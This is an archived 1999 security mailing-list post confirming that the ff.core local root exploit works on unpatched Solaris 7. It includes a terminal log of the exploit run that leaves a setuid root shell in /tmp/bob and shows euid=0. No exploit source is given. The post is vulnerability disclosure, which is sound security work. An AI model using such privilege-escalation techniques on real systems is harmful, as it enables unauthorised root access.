ff.core exploit on Solaris (2.)7

From: Daniel J. Frasnelli (dfrasnelat_private)
Date: Fri Jan 08 1999 - 09:43:20 PST

Next message: Dr. Mudge: "L0pht tmp tool and (mini) Advisory"

Previous message: James Nerlinger, Jr.: "Re: Bigfoot/Bellsouth Webmail bug"
Next in thread: Casper Dik: "Re: ff.core exploit on Solaris (2.)7"
Reply: Casper Dik: "Re: ff.core exploit on Solaris (2.)7"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,
        Confirmed ff.core exploit does exist in Solaris 7, server
edition.  System is straight installation, no patches of any category
available for 7 from Sunsolve yet.

Daniel

(12:32,99-01-08)
(dfrasnel@rogue)[~]> uname -spr
SunOS 5.7 sparc

(12:34,99-01-08)
(dfrasnel@rogue)[~]> ./test
Testing if exploit is possible...
Test successful. Proceeding...
Backing up clobbered files to /tmp/.bk
Doing sploit...
Done with sploit. Testing and trying to clean up now...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.
w00p! Should have a suid root sh in /tmp/bob
btw, its rksh because solaris is silly
Let me try to clean up my mess...
everything should be cool.. i think :>
# ls -la /tmp/bob
-rwsr-xr-x   1 root     root      192764 Jan  8 12:32 /tmp/bob
# id
(snip) euid=0(root)

Next message: Dr. Mudge: "L0pht tmp tool and (mini) Advisory"
Previous message: James Nerlinger, Jr.: "Re: Bigfoot/Bellsouth Webmail bug"
Next in thread: Casper Dik: "Re: ff.core exploit on Solaris (2.)7"
Reply: Casper Dik: "Re: ff.core exploit on Solaris (2.)7"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:28:14 PDT